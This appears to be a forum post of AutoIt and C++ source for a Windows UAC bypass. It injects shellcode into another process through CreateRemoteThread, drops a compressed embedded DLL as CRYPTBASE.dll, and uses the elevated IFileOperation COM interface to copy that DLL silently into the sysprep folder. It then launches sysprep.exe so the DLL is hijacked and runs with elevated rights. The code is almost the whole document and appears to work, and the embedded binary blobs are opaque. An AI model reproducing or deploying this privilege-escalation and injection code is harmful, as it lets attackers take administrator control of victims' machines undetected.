    DllStructSetData($Databuffer, "file", $sFile)
    DllStructSetData($Databuffer, "Parameters", $sParameters)
    DllStructSetData($Databuffer, "modulename", "Shell32.dll") ;Libreria
    DllStructSetData($Databuffer, "function", "ShellExecuteExW") ; Funcion
    DllStructSetData($Databuffer, "cbSize", 60) ;Tamaño Structura 60
    DllStructSetData($Databuffer, "fMask", $SEE_MASK_INVOKEIDLIST)
    DllStructSetData($Databuffer, "hwnd", $hWnd)



    $pRemoteData = _MemVirtualAllocEx($hProcess, 0, sizeof($Databuffer), $MEM_COMMIT, $PAGE_READWRITE)
    If Not $pRemoteData Then Return MsgBox(16, "Epic Failure", "Failed to allocate memory in process!")


    $Loadlibrary = DllCall("Kernel32.dll", "ptr", "GetProcAddress", "ptr", _WinAPI_GetModuleHandle("Kernel32.dll"), "str", "LoadLibraryW")
    $Loadlibrary = $Loadlibrary[0]

    $GetProcAddress = DllCall("Kernel32.dll", "ptr", "GetProcAddress", "ptr", _WinAPI_GetModuleHandle("Kernel32.dll"), "str", "GetProcAddress")
    $GetProcAddress = $GetProcAddress[0]

    $CodeBuffer = DllStructCreate("byte[33]")

    $pRemoteCode = _MemVirtualAllocEx($hProcess, 0, sizeof($CodeBuffer), $MEM_COMMIT, $PAGE_EXECUTE_READWRITE)


    ;Punteros a cadenas
    DllStructSetData($Databuffer, "lpVerb", $pRemoteData + (_ptr($Databuffer, "sverb") - _ptr($Databuffer)))
    DllStructSetData($Databuffer, "lpFile", $pRemoteData + (_ptr($Databuffer, "file") - _ptr($Databuffer)))
    DllStructSetData($Databuffer, "lpParameters", $pRemoteData + (_ptr($Databuffer, "Parameters") - _ptr($Databuffer)))



    DllStructSetData($CodeBuffer, 1, _
            "0x" & _
            "68" & SwapEndian($pRemoteData + (_ptr($Databuffer, "modulename") - _ptr($Databuffer))) & _  ; push RemoteData.modulename
            "B8" & SwapEndian($Loadlibrary) & _                                                         ; mov eax,LoadLibrary
            "FFD0" & _                                                                                  ; call eax
            "68" & SwapEndian($pRemoteData + (_ptr($Databuffer, "function") - _ptr($Databuffer))) & _   ; push RemoteData.function ShellExecuteExW
            "50" & _                                                                                    ; push eax
            "B8" & SwapEndian($GetProcAddress) & _                                                      ; mov eax,GetProcAddress
            "FFD0" & _                                                                                  ; call eax
            "68" & SwapEndian($pRemoteData + (_ptr($Databuffer, "cbSize") - _ptr($Databuffer))) & _         ; push Puntero SHELLEXECUTEINFO
            "FFD0" & _                                                                                  ; call eax
            "C3") ; Ret




    _WinAPI_WriteProcessMemory($hProcess, $pRemoteCode, _ptr($CodeBuffer), sizeof($CodeBuffer), $written)
    _WinAPI_WriteProcessMemory($hProcess, $pRemoteData, _ptr($Databuffer), sizeof($Databuffer), $written)

    $iThread = DllCall("Kernel32.dll", "int", "CreateRemoteThread", "ptr", $hProcess, "ptr", 0, "int", 0, "ptr", $pRemoteCode, "ptr", 0, "int", 0, "dword*", 0)
    $hThread = $iThread[0]


    _WinAPI_WaitForSingleObject($hThread)

    _MemVirtualFreeEx($hProcess, $pRemoteCode, 0, $MEM_RELEASE)
    _MemVirtualFreeEx($hProcess, $pRemoteData, 0, $MEM_RELEASE)


    $iThread = DllCall("Kernel32.dll", "ptr", "GetExitCodeThread", "ptr", $hThread, "dword*", 0)
    Return $iThread[2]
EndFunc   ;==>RemoteShellExecuteEx


Func sizeof($s)
    Return DllStructGetSize($s)
EndFunc   ;==>sizeof

Func _ptr($s, $e = "")
    If $e <> "" Then Return DllStructGetPtr($s, $e)
    Return DllStructGetPtr($s)
EndFunc   ;==>_ptr

Func SwapEndian($hex)
    Return Hex(BitOR(BitOR(BitOR(BitShift($hex, 24), _
            BitAND(BitShift($hex, -8), 0x00FF0000)), _
            BitAND(BitShift($hex, 8), 0x0000FF00)), _
            BitShift($hex, -24)), 8)
EndFunc   ;==>SwapEndian




;ASM
Func FileData()
    Local $Decompressed = ""
    Local $sDll = '0x000C0000104D5A80000100000004001000FFFF000040400C200000402003E01700008020201F0E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F17742062652072756E20696E20444F53206D6F64652E0D0A24203A60000B504500004C010300C57635536010200009E0000F010B0101460002200C00082003400000102004400300202007409D400B201FA0AE20BFA00040B8201701198260068027402BE00029A00EC0000330000042C044E06200042E74657874206F00ED2003609F20B36003E0020020EA05602E646174612013012405200420100100062003E000EC800020F202C02E69802860CB20D3604B000A2007E0020020272002E0050005C70500204000418E02C705142009405A096A00FF15E830400068222010016804211D02FF158C400F014E24200F401402FF1590400F401A02682A22400F0094400F003A401F800F601F012025202F000060044049006A201E02FF15EC40290032200A0168102019006AC050011C3120110036E00216804760160414040401A1404C06508B00FF50146A203501FF35402B01FF354048E0011A0040E0010A0054E0010A0008202E0115882076E0FF00E0FF00E0FF00E0FF00E0FF00E01C00045C0073007920030470007200652005005C2035164300520059005000540042004100530045002E0064006C20010000200B006C20270C76006100740069006F006E003A20230264006D200D006E2003007320170072601D006F200700212013026500772023027B00332015006426D40035200100372003022D00382001400B022D003460090030200902390032201D40130031200100626017006220374009006520210239007D20851F7555D03A57885048927711B85BDB8E095FAB7A945C0A134CB4D64BF7836FC9F80F1E6D824318E7EE42BC55A1E261C37BFE2032E0D4000074482BA0000050200B0088200300DC2003C000005E200B00E82003011431C01127F2200F001CE0020FE00300104B45524E454C33322E444C4C00004F4C45A00A035348454CC016009C203F00AA200300BA200300C620034000E00B1322330978697450726F63657373200D0B47657454656D705061746857200E07006C737472636174600B201B1153797374656D4469726563746F72795700F4205B0004A0A7E0030B22A70A6F496E697469616C697A65200E200F203F024F626A2039200D0024A033C007000020BD064372656174654920600D46726F6D50617273696E674E616D603EE0B000010000'
    $Decompressed = _LZF_Decompress($sDll)
    Return $Decompressed
EndFunc   ;==>FileData

;Dll
Func WriteDllTemp()
    Local $sTempPath = @TempDir
    Local $Decompressed = ""
    Local $sDll = '0x001E0000084D5A90000300000004200304FFFF0000B82007400000404004E016000080201F1F0E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F18742062652072756E20696E20444F53206D6F64652E0D0D0A24203B40000B504500004C010600FABF3453400F400009E0000E210B010232000C200D000E20034000001020044003003020074009400B000280B7400040BF600000702005A00C40D7402A602B4004200A40004006001020470046200C000420E80050200740040098A037E0040003600000C8E00410E01D0000C02057006CE0122A012E632108201F00B02003609020CBC0B7C0000020207D042E746578742010014A082004201001000A200300062003E00200201609602E7264617461000056401720DB604F40E8E00200209201402E8026010014411C2010607300122007E00200201605C02E72737263201361134120407300162010E00200202705402E72656C6F20286123212B6077001C2007E0020020270042E0020EE0FF00E07C0011837C240801750E8B442404A3D8420010E82220964014010275600604007505E838A01204037500B801200B03C20C0068200620042260600906E8BB0F0000A3D4403F00EB222401E8F1200E01E818202202C3E811200502E82617245D0035601F0097201A04C3C38B15E8202C035252FF354007804300AC204D018B15222D0A10011424E8471500008F05E0011D006520370231C0C3204DE0FF00E03C0001FF2524A90310FF25D8600500DC600500E0600500E4400505742404FF35EC21AA0DE8CE05000085C07417FF30FF15E8E0051A00D8201A03C204006A40010210E85524290A681E2000106A046A04A3F0403B00F220200168F4200900A3404A02FF15EC203F09C3558BEC51535657FF356022001820350A834DFCFF8BF833F6FF15F020201F8A0884C974758B550880F92075064080382074FA8A0833DB4380F9227523408A02088BF020200016200D017407200D1184C975F480380074058BD040EB218BD0EB1D201D02178BF0203DE0031F1C8BD07404EBDE33DB8B0F3B4DFC75078B4D0885C9751A85DB7403FF45FC205E00F62047028E837D22F713138B45FCEB1485F6740D2BD68911FF078BC6EB06202E068321005F5E5BC920EF40C080BD058365FC00E85620E4201F0585C97802890820D8068D45FC50E817FF200009750C8B75FC568BD8E84F20E406568BF85357E8B720090583C40CC60437804D0008604D03568B35F420F9016A02414A403F04FFD650FF3740040115F82017005E217F000D200F617F209D0B8907C9C3558D6C249C81ECC4220C20731033DB6A445E5633FF8D45DC534750C74560261A1B00895D58895D50895D44895D5C895D48895D54895D40895D4CC7453047600D895D34897D38E8F3FDFFFF8A4D7820940C8975DC'
    $sDll &= '897D08F6C102740B33C020430028204309EB028BC76689450CBE0024000EF6C140741D8B457C3BC374168B400C2006040FC7450801201919894514897D4CEB39F6C1047438F6C1107433538D4530508D45502003005820C600FC20C620C5091C8B45580975088D7D50203101E801212302C7454C203F1300836560F78B457883E00489453C7472F6457808E00043005C20430044E00443005C60430844894518E8BDFEFFFF403CA04720380020E00038005420380048E0043800546038054889451CE884E0053813857508742A8B3500410010395D1475076AF6FFD620A302395D18200B00F5400B0318395D1C200B00F4400B0C1C8B7D6C3BFB750AC7456C06302193097D6C395D707507C74570400E0257E8D6285106FF75708BF0E8CC20090759598D4406045053850902FF1504206409803F2289457C7423BE04203F035650E8AA20270557FF757CE8A7200800564008009E20080883C418EB095750E88C200B0959598B7570381E74196827E700104021007C2015602A007320080183C4221A007421930A0738187503895D748D452020FF0CDC50FF757453FF7560FF754C532007047C53FF1508207F0485C00F848E2178018B3543D40C395D5C7405FF755CFFD6395D58400900584009005440090754FFD6FF7524FFD621590301740B6A22D50320FF150C204105395D3C7445BF43DD0357FF15102010036A2868E023EB01E87428D2075959578BF0FF151420161E8B452089068B45288946048B454489460C8B45508946088B4548894610E92A21FD405200D66009018B3DE0048D03D7395D444083004440090050400900504009A0A1201DA0A120090048401D0248FFD720A603780F85E520D90A395D74753B8B756C56E84828F30D8D7430FF8B456C593BF07626803E20ED044E3BF077F6200D00182120027CE82B2022022B756C22DC1D5959885C06018945746A3C5E568D45A05350E8D0FAFFFF0FB7450C8945BC2162028945B82048088945B08B45708945B42338202507508975A0C745A440218802C745AC420402FF152420FC22F3005C2092A13900D8E10139003AE10B39003A210CE1043914D8834E04FF8906895E0C895E08895E10897540EB0C404703D7C74540202C213A21D0676002FF1518206F028B454024A50583C564C9C21445960100B8408B01505025D00514E8C8FBFFFF24BF27F3130885C078118B4C24043B41087D068B490C8B048120AA0707833800750233C0249640244020202800204024061B8B510C8D048220200A741CFF316A00FF30E8B9F9237A0AC40CEB0C5083C11051E8AA208E015959203A0356578B3D42E2036A206A08A09B02D78BF02050040C83661000220B05442414894614200600102213220A03C1E00250E0012A2221035F8BC65E286C2021000420AF005620BC0008E0001F633D28A8201E08F074'
    $sDll &= '0656FF54241059802EE0092620D2001340C4078B1185D2740789422008078910890183C008C3205B60DF0583E8088B103929090289118B25C30A741783610400EB118B4804A01007068B50048951045020F2E1026746C5006A290328BA20180015474505A30C430010C768B921090300C70510200F400A00A14008203F018B0D4021005180C100A348EF025DC3CCC000265400A14012E0032761D0001540340252FF1547A2E0052F0383EC08A14927070345088945F88B0D40660C83E904394DF87C338B55F881C2204F02008915401660820583C005508B0D2014011051208CC057001C2235608C607E000342E508FC8B4D0C034D08890D405D266F028BE55D21D602FF25C4203A02FF25C8600500CC600500D0200520EBE0FF00E0A20048204BF2E00300CF8B00422E47445CC0030038200F003C200300402003007721EF004B2007140000546573742E646C6C004D7946756E6374696F6E2015E0FF00E09B000054241FC0000136412FFC200F006C2003C0000080201324D90100B82003C00000C62FD126D8E00C00002C2017008E20030098200300A2200300AC200340000042200700502003005E2003006C200300B6200300C4200300E0200300F22003000620530018200300262003003620030042200300542003006A200300822003009A200300A62003400000B4A007E0636B0699026D656D7365318E054D535643525462F50B00A40248656170437265617431D000A5600D004423131F726F790005014578697450726F6365737300F7014765744D6F64756C6548616E02646C6520F3074B45524E454C3332804B01C1022037056E63707900BE4009016C65234A00BA400940120100B660090061207F054400436C6F73A0450E00B902496E697469616C697A65437220090463616C536583890070407303436F6D6D2070024C696E207200AA601104757272656EE0009905D5004475706C20370074C05301920080D10250697020D5013E0220B90253746480B621D560E502416C6C31FA0095C02980E520D3116E0457616974466F7253696E676C654F626A208C0700DA00456E746572E007A00600F4024C656176E008B80100A6606302467265206F00A9600B01526580712CEA1268656C6C45786563757465457841005348454C414402444C4C201DE0FF00E01F00C5EF53BC25D64613008051BC33CE55E2E0021F000120012607E00A1700092AF1542600A0200400944024E00200E0015F803F0078E00E3F009020330434520000632C38C00002940134200A04560053005F20050245005220090449004F004E200F004920050046200B400003BD04EFFE405F40008005E00107E00F0000F220180001204F087400720069006E0067204D006935B500652059046E0066006F201F00CE200300012D68C00102340062200B20A7358802010043'
    $sDll &= '2023006D36720061202F0079208D0061200D22AE200000502049026E006B214B00532023006620634137000C20330050206D066F0064007500632015E003330054203B00732013004C203B006220250061200323F603004A00132037004C201D00672013006C60750070201940B500672A7C405B00412017006C206D0052203B8013400B404F006520270076200500642049443940CF005620470072E00AED25D376100054201D40D3007320530061205F006920B1239260000BB0043C3F786D6C207665727327EB083D22312E302220656E36D023EE0A3D225554462D3822207374247117616C6F6E653D22796573223F3E0A3C617373656D626C7920203F1F6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A6173056D2E7631222024B6016966254C0056E0036C033E0A2020E0004B01496424C70269747920130020E004934001002260153890457F076F72417263686974248C017572209502583836801F026E616D200E25240470616E794E200C002E24CB0364756374600B06596F7572417070802A02747970202A0777696E333222202F6088066465736372697048F7023E3C2FE0030D207C201D0270656E20A2016379400EE00210017441A10C80172019C11DE004D14000E003742053800080B4004DC135082E57696E646F77732E20C6066D6F6E2D436F6E2681016C73E00130E100AF00364119C11B4000E1171F400002707562261F064B6579546F6B6521F40F36353935623634313434636366316466E00167066C616E677561672126002AA12220DB002FC107E004F6E00116411E020A3C2FC102003E6269E0FF00E0540025F045EB0C0C304C306C307930813091309F44E02C185A9B1F023008300E3014301A30243035303F30573060306A306F3075308330963041311F9031A831B5316F32B332EC3217334933583376337C338933BC33FC330A343E341F48344F345634663498345D3563357835823589359035A035CD35D335E9355F361F69369436B436BA36DB36E13635373B374E375337593763376C3775377C3781371F94379D37A437AA37B137C737D337EA37EF37F937023809380E38133825383438043A384038462690E0FF00E02500010000'

    $Decompressed = _LZF_Decompress($sDll)
    FileWrite($sTempPath & "\CRYPTBASE.dll", $Decompressed)
EndFunc   ;==>WriteDllTemp





;By Ward
Func _LZF_Exit()
    $_LZF_CodeBuffer = 0
    _MemVirtualFree($_LZF_CodeBufferMemory, 0, $MEM_RELEASE)
EndFunc   ;==>_LZF_Exit

Func _LZF_Startup()
    If Not IsDllStruct($_LZF_CodeBuffer) Then
        If @AutoItX64 Then
            Local $Opcode = '0x89C04883EC38488B41084C894C2420488B094589C14989C0E81E0000004883C438C389DB4883EC084589C14C8B4108488B094883C408E94404000041574156415541544589CC4F8D2420555756534883EC184585C9488BB424800000000F841602000085D20F840E02000089D20FB6014D8D48014C8D3C110FB651014531DB418D5FFE498D6FFEC1E00809C2895C240C4889C8EB28EB01904D39E10F83D80100000FB6184183C3014883C0014188194983C1014183FB200F84710200004839E80F834E01000089D30FB650024C8D5002C1E30809DA8D3C9289D3C1EB0829FB81E3FFFF0000488D1CDE488B3B488903488D58FF4829FB4881FBFF1F000077994839F94C8D680473904D39FD738B440FB73766443B307581440FB67702453A320F8573FFFFFF498D51044939D40F8635010000448B54240CBA08010000458D73FF4129C24181FA08010000440F47D24489DAF7D24863D24588341131D24585DB0F94C24929D14183FA100F86FE010000440FB67703BA0200000041BB20000000443A70030F84030100004883C0014889DF48C1EF084101FB4588194983C1014801D04188194983C1024839E80F839F0100000FB658FE0FB650FF4C8D50FE498D7A01C1E30809DA0FB618C1E20809DA448D1C9289D3C1E208C1EB084429DB4531DB81E3FFFF00004C8914DE0FB65F0209DA89D3448D1492C1EB084429D381E3FFFF00004839E848893CDE0F82B7FEFFFFEB03909090498D51034939D4725C4C39F8732390900FB6104183C3014883C0014188114983C1014183FB200F84FF0000004939C777DF4489D8418D53FFF7D048984188140131C04585DB0F94C04929C14489C84429C0EB144585DB750D498D51034939D40F87B9FEFFFF31C04883C4185B5E5F5D415C415D415E415FC3440FB67704B20341BB40000000453A75000F85E6FEFFFF440FB66F05B20441BB60000000443A68050F85CFFEFFFF440FB66F06B20541BB80FFFFFF443A68060F85B8FEFFFF440FB66F07B20641BBA0FFFFFF443A68070F85A1FEFFFF440FB66F08B20741BBC0FFFFFF443A68080F858AFEFFFF0FB657093A50097450BA0800000031FF4883C0014989DA4188790149C1EA084183EA204588114983C102E970FEFFFF41C641DF1F4530DB4983C101E97EFDFFFF41C641DF1F4530DB4983C101E9F0FEFFFF4531DBE9BCFEFFFF0FB6570A3A500A7442BA09000000BF01000000EBA2BA0200000083C2014139D2760E4189D3460FB62C1F463A2C1874EA448D52FE4883C0014183FA06763D418D7AF9418D5201E970FFFFFF0FB6570B3A500B740FBA0A000000BF02000000E954FFFFFF0FB6570C3A500C7421BA0B000000BF03000000E93CFFFFFF4489D2C1E2054189D3418D5201E9A8FDFFFF0FB6570D3A500D740FBA0C000000BF04000000E912FFFFFF0FB6'
            $Opcode &= '570E3A500E740FBA0D000000BF05000000E9FAFEFFFF0FB6570F3A500F740FBA0E000000BF06000000E9E2FEFFFF0FB657103A5010740FBA0F000000BF07000000E9CAFEFFFF0FB657113A5011740FBA10000000BF08000000E9B2FEFFFF0FB657123A5012740FBA11000000BF09000000E99AFEFFFFBA12000000E9F3FEFFFF5789D24589C94989CA488D14114F8D0C08564C89C74883EC08EB2EEB008D4E0189C8488D34074939F10F8293000000498D04024839C20F82860000004C89D6F3A44989F24939D27357410FB6324983C20183FE1F76C74C39D2766789F1C1E90583F907744889C8450FB61A488D4407024939C1724D48C1E608450FB6DB81E6001F000048F7D6488D34374C29DE4939F077304983C20183C102F3A44939D272A989F84883C4085E4429C05FC390410FB60A4983C2014C39D276080FB6C983C107EBA34883C40831C05E5FC3'
        Else
            Local $Opcode = '0x89C083EC2C8B54243C8B442430895424108B5424388954240C8B5004895424088B542434895424048B00890424E83600000083C42CC2100089DB83EC1C8B4424208B5424288954240C8B5004895424088B542424895424048B00890424E86A04000083C41CC210005557565383EC208B4424408B4C243C8B54243801C185C0894C24100F841B02000085D20F84130200008B5C243431F6035424348B44243C8954241C0FB6138B7C241C0FB64B0183C001C1E20883EF0209D189DA897C240CEB213B4424100F83D90100000FB61A83C60183C201881883C00183FE200F84220200003B54240C0F835A0100008D6A0289CB896C24180FB64A02C1E30809D989CBC1EB088D3C8929FB8B7C244481E3FFFF00008D1C9F8B3B89138D5AFF29FB81FBFF1F0000895C24087797397C24348D6A04896C2414738A8B5C241C39DD73820FB71F663B1A0F8576FFFFFF8B6C24180FB65F023A5D000F8565FFFFFF8D4804394C24100F862A0100008B4C241C29D183E90281F9080100000F873001000089F385F6F7D3895C24188B6C24188D5EFF881C280F94C389DE81E6FF00000029F083F9100F86940100000FB66F03BE02000000C64424182089EB3A5A030F84F700000083C2018B4C2408C1E908024C2418880883C0010FB64C240801F2880883C0023B54240C0F830A0200000FB65AFE8D72FF0FB64AFF8D7AFEC1E30809D90FB61AC1E10809D989CB8D2C89C1EB0829EB8B6C244481E3FFFF0000C1E108897C9D000FB65E0209D989CBC1EB088D3C8929FB81E3FFFF000089749D0031F63B54240C0F82A6FEFFFF8D4803394C241072553B54241C731F8B5C241C0FB60A83C60183C201880883C00183FE200F84A300000039D377E589F2F7D28D4EFF880C1031D285F60F94C229D02B44243C83C4205B5E5F5DC385F6750D8D4803394C24100F87C5FEFFFF83C42031C05B5E5F5DC3B908010000E9C6FEFFFF8B6C241466BE0300C6442418400FB65F043A5D000F85EFFEFFFF0FB66F0566BE0400C64424186089EB3A5A050F85D7FEFFFF0FB6770689F33A5A06742DBE05000000C644241880E9BDFEFFFFC640DF1F6631F683C001E9CFFDFFFFC640DF1F6631F683C001E94EFFFFFF0FB6770789F33A5A077470BE06000000C6442418A0E985FEFFFFBE020000008B5C240801F78D2C32894C240483C6013974240476180FB64F0183C701884C24180FB64D0183C501384C241874DF8D4EFE83C20183F906895C2408765083E90783EE018B7C2408884801C1EF0883EF2089FB881883C002E937FEFFFF0FB6770889F33A5A08740FBE07000000C6442418C0E90AFEFFFF0FB6770989F33A5A09741BBE0800000031C983C201EBB6C1E10583EE01884C2418E9E7FDFFFF0FB6770A89F33A5A0A7413BE09000000B901000000EBD531F6E94BFEFFFF0FB6770B'
            $Opcode &= '89F33A5A0B740CBE0A000000B902000000EBB70FB6770C89F33A5A0C740CBE0B000000B903000000EBA00FB6770D89F33A5A0D740CBE0C000000B904000000EB890FB6770E89F33A5A0E740FBE0D000000B905000000E96FFFFFFF0FB6770F89F33A5A0F740FBE0E000000B906000000E955FFFFFF0FB6771089F33A5A10740FBE0F000000B907000000E93BFFFFFF0FB6771189F33A5A11740FBE10000000B908000000E921FFFFFF0FB6771289F33A5A12740FBE11000000B909000000E907FFFFFFBE12000000E975FEFFFF5557565383EC048B5424188B44241C8B4C2420034C24248B7C242001D0890C24EB1C8D4E018D1C0F391C2472778D1C0A39D8727089D6F3A489F239C273460FB63283C20183FE1F76D939D0765789F1C1E90583F907743B83C1020FB61A8D2C0F392C24723F83E61F0FB6DBC1E608F7D68D343729DE39742420772983C201F3A439C272BA89F82B44242083C4045B5E5F5DC30FB60A83C20139D076080FB6C983C107EBB383C40431C05B5E5F5DC3'
        EndIf
        $_LZF_Compress = (StringInStr($Opcode, "89C0") - 3) / 2
        $_LZF_Decompress = (StringInStr($Opcode, "89DB") - 3) / 2
        $Opcode = Binary($Opcode)

        $_LZF_CodeBufferMemory = _MemVirtualAlloc(0, BinaryLen($Opcode), $MEM_COMMIT, $PAGE_EXECUTE_READWRITE)
        $_LZF_CodeBuffer = DllStructCreate("byte[" & BinaryLen($Opcode) & "]", $_LZF_CodeBufferMemory)
        DllStructSetData($_LZF_CodeBuffer, 1, $Opcode)
        OnAutoItExitRegister("_LZF_Exit")
    EndIf
EndFunc   ;==>_LZF_Startup


Func _LZF_Decompress_Core($Data, $MaxBuffer)
    If Not IsDllStruct($_LZF_CodeBuffer) Then _LZF_Startup()

    $Data = Binary($Data)
    Local $InputLen = BinaryLen($Data)
    Local $Input = DllStructCreate("byte[" & $InputLen & "]")
    DllStructSetData($Input, 1, $Data)

    Local $Output = DllStructCreate("byte[" & $MaxBuffer & "]")

    Local $Var = DllStructCreate("ptr src; ptr dst")
    DllStructSetData($Var, "src", DllStructGetPtr($Input))
    DllStructSetData($Var, "dst", DllStructGetPtr($Output))

    Local $Ret = DllCall("user32.dll", "uint", "CallWindowProc", "ptr", DllStructGetPtr($_LZF_CodeBuffer) + $_LZF_Decompress, _
            "ptr", DllStructGetPtr($Var), _
            "uint", $InputLen, _
            "uint", $MaxBuffer, _
            "int", 0)

    Return BinaryMid(DllStructGetData($Output, 1), 1, $Ret[0])
EndFunc   ;==>_LZF_Decompress_Core


Func _LZF_Decompress($Data)
    If Not IsDllStruct($_LZF_CodeBuffer) Then _LZF_Startup()

    $Data = Binary($Data)
    Local $OutputLen = Int(BinaryMid($Data, 1, 4))
    Return _LZF_Decompress_Core(BinaryMid($Data, 5), $OutputLen)
EndFunc   ;==>_LZF_Decompress
Код:
#define _HAS_EXCEPTIONS 0

#include <windows.h>
#include <commctrl.h>
#include <shlobj.h>
#include <psapi.h>


struct InjectArgs
{
   
    BOOL    (WINAPI *FFreeLibrary)(HMODULE hLibModule);
    HMODULE (WINAPI *FLoadLibrary)(LPCWSTR lpLibFileName);
    FARPROC (WINAPI *FGetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
    BOOL    (WINAPI *FCloseHandle)(HANDLE);
    DWORD   (WINAPI *FWaitForSingleObject)(HANDLE,DWORD);

    wchar_t szSourceDll[MAX_PATH];
    wchar_t szElevDir[MAX_PATH];
    wchar_t szElevDll[MAX_PATH];
    wchar_t szElevDllFull[MAX_PATH];
    wchar_t szElevExeFull[MAX_PATH];
    wchar_t szElevArgs[MAX_PATH];
    wchar_t szEIFOMoniker[MAX_PATH]; // szElevatedIFileOperationMoniker


    IID     pIID_EIFO;
    IID     pIID_ShellItem2;
    IID     pIID_Unknown;

    wchar_t NameShell32[20];
    wchar_t NameOle32[20];
    char    NameCoInitialize[20];
    char    NameCoUninitialize[20];
    char    NameCoGetObject[20];
    char    NameCoCreateInstance[20];
    char    NameSHCreateItemFromParsingName[30];
    char    NameShellExecuteExW[20];

    SHELLEXECUTEINFO shinfo;
    BIND_OPTS3 bo;
};

static DWORD WINAPI RemoteCodeFunc(InjectArgs * Args)
{

    NTSTATUS Status = 0;

    HMODULE ModuleOle32    = Args->FLoadLibrary(Args->NameOle32);
    HMODULE ModuleShell32  = Args->FLoadLibrary(Args->NameShell32);

    if (!ModuleOle32 || !ModuleShell32)
        return 0;

    HRESULT (WINAPI * FCoInitialize)(LPVOID pvReserved) = (HRESULT (WINAPI * )(LPVOID pvReserved))Args->FGetProcAddress(ModuleOle32, Args->NameCoInitialize);
    void (WINAPI * FCoUninitialize)(void) = (void (WINAPI * )(void))Args->FGetProcAddress(ModuleOle32, Args->NameCoUninitialize);
    HRESULT (WINAPI * FCoGetObject)(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv) = (HRESULT (WINAPI * )(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv))Args->FGetProcAddress(ModuleOle32, Args->NameCoGetObject);
    HRESULT (WINAPI * FCoCreateInstance)(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv) = (HRESULT (WINAPI * )(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv))Args->FGetProcAddress(ModuleOle32, Args->NameCoCreateInstance);
    HRESULT (WINAPI * FSHCreateItemFromParsingName)(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv) = (HRESULT (WINAPI * )(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv))Args->FGetProcAddress(ModuleShell32, Args->NameSHCreateItemFromParsingName);
    BOOL (WINAPI * FShellExecuteEx)(LPSHELLEXECUTEINFOW lpExecInfo) = (BOOL (WINAPI * )(LPSHELLEXECUTEINFOW lpExecInfo))Args->FGetProcAddress(ModuleShell32, Args->NameShellExecuteExW);

    if (!FCoInitialize || !FCoUninitialize || !FCoGetObject || !FCoCreateInstance || !FSHCreateItemFromParsingName || !FShellExecuteEx ||
        FCoInitialize(NULL) != S_OK)
        return 0;

    Args->bo.cbStruct = sizeof(BIND_OPTS3);
    Args->bo.dwClassContext = CLSCTX_LOCAL_SERVER;

    IFileOperation *pFileOp = 0;
    IShellItem *pSHISource = 0;
    IShellItem *pSHIDestination = 0;
    IShellItem *pSHIDelete = 0;
   
    if (FCoGetObject(Args->szEIFOMoniker, &Args->bo, Args->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)) == S_OK &&
        pFileOp &&
        pFileOp->SetOperationFlags(FOF_NOCONFIRMATION|FOF_SILENT|FOFX_SHOWELEVATIONPROMPT|FOFX_NOCOPYHOOKS|FOFX_REQUIREELEVATION|FOF_NOERRORUI) == S_OK && // FOF_NOERRORUI is important here to not show error messages, copying fails on guest (takes wrong path)
        FSHCreateItemFromParsingName( Args->szSourceDll, NULL, Args->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHISource)) == S_OK &&
        pSHISource &&
        FSHCreateItemFromParsingName( Args->szElevDir, NULL, Args->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDestination)) == S_OK &&
        pSHIDestination &&
        pFileOp->CopyItem(pSHISource, pSHIDestination, Args->szElevDll, NULL) == S_OK &&
        pFileOp->PerformOperations() == S_OK)
    {
    
        Args->shinfo.cbSize = sizeof(SHELLEXECUTEINFO);
        Args->shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
        Args->shinfo.lpFile = Args->szElevExeFull;
        Args->shinfo.lpParameters = Args->szElevArgs;
        Args->shinfo.lpDirectory = Args->szElevDir;
        Args->shinfo.nShow = SW_SHOW;
       
        if ((Status = FShellExecuteEx(&Args->shinfo)))
        {
            Args->FCloseHandle(Args->shinfo.hProcess);
        }
    }

    if (pSHIDelete)      { pSHIDelete->Release();      }
    if (pSHIDestination) { pSHIDestination->Release(); }
    if (pSHISource)      { pSHISource->Release();      }
    if (pFileOp)         { pFileOp->Release();         }

    FCoUninitialize();
    Args->FFreeLibrary(ModuleShell32);
    Args->FFreeLibrary(ModuleOle32);

    return Status;
}

int AttemptOperation(bool bInject, HANDLE TargetProcess, const wchar_t *szPathToOurDll)
{
    NTSTATUS Status = 0;

    const BYTE * codeStartAdr = (BYTE *)RemoteCodeFunc;
    const BYTE * codeEndAdr   = (BYTE *)AttemptOperation;

    if (codeStartAdr >= codeEndAdr)
        return 0;

    InjectArgs ia;
    memset(&ia, 0, sizeof(ia));

    ia.FFreeLibrary         = FreeLibrary;
    ia.FLoadLibrary         = LoadLibrary;
    ia.FGetProcAddress      = GetProcAddress;
    ia.FCloseHandle         = CloseHandle;
    ia.FWaitForSingleObject = WaitForSingleObject;

    wcscpy(ia.NameShell32,                      L"shell32.dll");
    wcscpy(ia.NameOle32,                        L"ole32.dll");
    strcpy(ia.NameCoInitialize,                 "CoInitialize");
    strcpy(ia.NameCoUninitialize,               "CoUninitialize");
    strcpy(ia.NameCoGetObject,                  "CoGetObject");
    strcpy(ia.NameCoCreateInstance,             "CoCreateInstance");
    strcpy(ia.NameSHCreateItemFromParsingName,  "SHCreateItemFromParsingName");
    strcpy(ia.NameShellExecuteExW,              "ShellExecuteExW");

    wchar_t SystemDirectory[MAX_PATH];
    if (!GetSystemDirectory(SystemDirectory, MAX_PATH))
        return 0;

    wcscpy(ia.szSourceDll,      szPathToOurDll);
    wcscpy(ia.szElevDir,        SystemDirectory);
    wcscat(ia.szElevDir,        L"\\sysprep");
    wcscpy(ia.szElevDll,        L"CRYPTBASE.dll");
    wcscpy(ia.szElevExeFull,    SystemDirectory);
    wcscat(ia.szElevExeFull,    L"\\sysprep\\sysprep.exe");
